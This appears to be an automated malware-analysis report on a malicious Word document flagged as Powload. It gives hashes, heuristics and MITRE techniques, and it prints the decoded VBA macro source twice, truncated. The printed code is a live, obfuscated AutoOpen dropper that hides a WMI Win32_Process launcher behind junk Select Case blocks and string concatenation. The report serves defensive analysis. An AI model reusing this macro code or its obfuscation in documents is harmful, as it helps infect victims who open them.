Office (OLE) malware analysis — malicious · 8d2de893cfdff2bb

MALICIOUS

Office (OLE)

155.5 KB Created: 2019-05-02 17:42:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: b31453bbc270351b0bcf50a89384cdb1 SHA-1: 5bb56a6408040a10d2b0a9183f5233e0f96403eb SHA-256: 8d2de893cfdff2bb43f45e0daec423ef070eb67df0dcdf7b9393113b122f8a9d

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros, including an AutoOpen macro, which is a common technique for malicious Office documents. The critical heuristic firing indicates the use of WMI (Win32_Process.Create) via VBA, suggesting the macro is designed to launch a secondary payload or process. The ClamAV detection name further supports its malicious nature.

Heuristics 7

ClamAV: Doc.Malware.Powload-6960282-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Powload-6960282-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8156 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8156 bytes
SHA-256: `6eb678ca13808c0ceb6f1439572fedaa5d97af9fd9b328f46f23b116b69e2943`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "n796685" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "G0691882" Attribute VB_Base = "0{CAED838C-D24C-4667-A69E-BB5E47197F60}{FC0332C9-EE49-4C51-89A9-619A5903126D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "E835_6" Attribute VB_Name = "z4091088" Attribute VB_Name = "C5_97962" Attribute VB_Name = "j0_4_168" Attribute VB_Base = "0{351BFC18-6341-4ADE-8601-8B294EC7AD83}{02ABF5B3-7D53-49C1-8479-E991A6546B11}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "u45743" Function J75203(Z5365_0) Select Case E9483_4 Case u59_3080 = J658_568 = Sgn(281823806) Case W886070 = z9601764 Case s81470 = Log(T48414) Case n155394 = CBool(855321417) Case w675_23 = 9912910 Case R4272663 = CDate(n26795_1) End Select Select Case Q935_623 Case t4_1831 = I5994490 = Sgn(100076860) Case N1268_2 = X6962_ Case j18607_ = Log(E012712) Case s26581 = CBool(288668321) Case j837523 = 217753308 Case C453210 = CDate(z067711) End Select Set J75203 = CVar(Z5365_0) Select Case a0715278 Case l_62_1 = w975_0 = Sgn(425756888) Case N_3812_ = O909_147 Case z50857 = Log(W10883) Case p07896_ = CBool(74968950) Case J20615 = 805101607 Case L53929 = CDate(I171837) End Select Select Case b585899 Case M085_542 = L59395 = Sgn(581916430) Case R9_8720 = X1_760 Case z98357 = Log(Y193__2) Case o14314 = CBool(82764585) Case i648_0 = 704630931 Case q84_263 = CDate(F056_7) End Select End Function Sub autoopen() Select Case u4003748 Case V690_5_ = b383083 = Sgn(789975877) Case L90_533 = I6205389 Case Q819307 = Log(w21012) Case a648953 = CBool(752808993) Case U413__5 = 958880284 Case C82011 = CDate(H829072) End Select Select Case D90_582 Case j871788 = Q896926 = Sgn(550810862) Case J05987 = l670727 Case f185986 = Log(i61860) Case S830_6_1 = CBool(998164648) Case V18077_6 = 501379556 Case J_95027 = CDate(n589__) End Select Select Case j31__904 Case I8034537 = r04833_ = Sgn(937145698) Case l15_31_ = v228480 Case I1318_09 = Log(m900712) Case v_4652 = CBool(309181841) Case H__50299 = 324933311 Case X162718 = CDate(d83775) End Select Call Z0751158 Select Case I1_565 Case H890_798 = s356282 = Sgn(855302431) Case X23_70 = N44101 Case A079_18_ = Log(j8_447) Case L_6941 = CBool(971891834) Case R304472 = 640111904 Case H25549 = CDate(w4_197) End Select Select Case m99231 Case K04333 = H1678202 = Sgn(851657368) Case F18564 = s776_5 Case G721974 = Log(p858_841) Case E659__ = CBool(215750355) Case b763678 = 456767223 Case b68168 = CDate(T0045332) End Select End Sub Attribute VB_Name = "M2790354" Function Z0751158() On Error Resume Next Select Case L2081048 Case v3867315 = r410739 = Sgn(771991915) Case U428390 = E40860 Case P71534 = Log(u21101) Case r672_305 = CBool(314658747) Case H_86_6_6 = 178142381 Case I17857 = CDate(J19_9131) End Select Select Case i637213 Case h99_164 = k35612_ = Sgn(408621320) Case z6004_ = X_75983_ Case F_365760 = Log(Y18921) Case q06188 = CBool(857799524) Case R5842214 = 883505116 Case F345_44 = CDate(r398312) End Select Set z651436 = J75203(GetObject("wi" _ + "nmg" + "mts:W" _ + "in32_P" + "rocess" _ + "Sta" + "rtup")) Select Case M17453 Case i04059 = j66120_3 = Sgn(622649106) Case b003_2 = d623_39 Case b3135449 = Log(w524863) Case j859026 = CBool(295591105) Case i95219 = 430042625 Case G6758773 = CDate(Y98631) End Select Select Case K516041_ Case M14201 = u38959 = Sgn(524907171) Case z499 ... (truncated)

SHA-256: 6eb678ca13808c0ceb6f1439572fedaa5d97af9fd9b328f46f23b116b69e2943

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "n796685"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "G0691882"
Attribute VB_Base = "0{CAED838C-D24C-4667-A69E-BB5E47197F60}{FC0332C9-EE49-4C51-89A9-619A5903126D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "E835_6"

Attribute VB_Name = "z4091088"

Attribute VB_Name = "C5_97962"

Attribute VB_Name = "j0_4_168"
Attribute VB_Base = "0{351BFC18-6341-4ADE-8601-8B294EC7AD83}{02ABF5B3-7D53-49C1-8479-E991A6546B11}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "u45743"
Function J75203(Z5365_0)
   Select Case E9483_4
Case u59_3080 = J658_568 = Sgn(281823806)
Case W886070 = z9601764
Case s81470 = Log(T48414)
Case n155394 = CBool(855321417)
Case w675_23 = 9912910
Case R4272663 = CDate(n26795_1)
End Select
   Select Case Q935_623
Case t4_1831 = I5994490 = Sgn(100076860)
Case N1268_2 = X6962_
Case j18607_ = Log(E012712)
Case s26581 = CBool(288668321)
Case j837523 = 217753308
Case C453210 = CDate(z067711)
End Select
Set J75203 = CVar(Z5365_0)
   Select Case a0715278
Case l_62_1 = w975_0 = Sgn(425756888)
Case N_3812_ = O909_147
Case z50857 = Log(W10883)
Case p07896_ = CBool(74968950)
Case J20615 = 805101607
Case L53929 = CDate(I171837)
End Select
   Select Case b585899
Case M085_542 = L59395 = Sgn(581916430)
Case R9_8720 = X1_760
Case z98357 = Log(Y193__2)
Case o14314 = CBool(82764585)
Case i648_0 = 704630931
Case q84_263 = CDate(F056_7)
End Select
End Function
Sub autoopen()
   Select Case u4003748
Case V690_5_ = b383083 = Sgn(789975877)
Case L90_533 = I6205389
Case Q819307 = Log(w21012)
Case a648953 = CBool(752808993)
Case U413__5 = 958880284
Case C82011 = CDate(H829072)
End Select
   Select Case D90_582
Case j871788 = Q896926 = Sgn(550810862)
Case J05987 = l670727
Case f185986 = Log(i61860)
Case S830_6_1 = CBool(998164648)
Case V18077_6 = 501379556
Case J_95027 = CDate(n589__)
End Select
   Select Case j31__904
Case I8034537 = r04833_ = Sgn(937145698)
Case l15_31_ = v228480
Case I1318_09 = Log(m900712)
Case v_4652 = CBool(309181841)
Case H__50299 = 324933311
Case X162718 = CDate(d83775)
End Select
Call Z0751158
   Select Case I1_565
Case H890_798 = s356282 = Sgn(855302431)
Case X23_70 = N44101
Case A079_18_ = Log(j8_447)
Case L_6941 = CBool(971891834)
Case R304472 = 640111904
Case H25549 = CDate(w4_197)
End Select
   Select Case m99231
Case K04333 = H1678202 = Sgn(851657368)
Case F18564 = s776_5
Case G721974 = Log(p858_841)
Case E659__ = CBool(215750355)
Case b763678 = 456767223
Case b68168 = CDate(T0045332)
End Select
End Sub

Attribute VB_Name = "M2790354"
Function Z0751158()
On Error Resume Next
   Select Case L2081048
Case v3867315 = r410739 = Sgn(771991915)
Case U428390 = E40860
Case P71534 = Log(u21101)
Case r672_305 = CBool(314658747)
Case H_86_6_6 = 178142381
Case I17857 = CDate(J19_9131)
End Select
   Select Case i637213
Case h99_164 = k35612_ = Sgn(408621320)
Case z6004_ = X_75983_
Case F_365760 = Log(Y18921)
Case q06188 = CBool(857799524)
Case R5842214 = 883505116
Case F345_44 = CDate(r398312)
End Select
Set z651436 = J75203(GetObject("wi" _
+ "nmg" + "mts:W" _
+ "in32_P" + "rocess" _
+ "Sta" + "rtup"))
   Select Case M17453
Case i04059 = j66120_3 = Sgn(622649106)
Case b003_2 = d623_39
Case b3135449 = Log(w524863)
Case j859026 = CBool(295591105)
Case i95219 = 430042625
Case G6758773 = CDate(Y98631)
End Select
   Select Case K516041_
Case M14201 = u38959 = Sgn(524907171)
Case z499
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.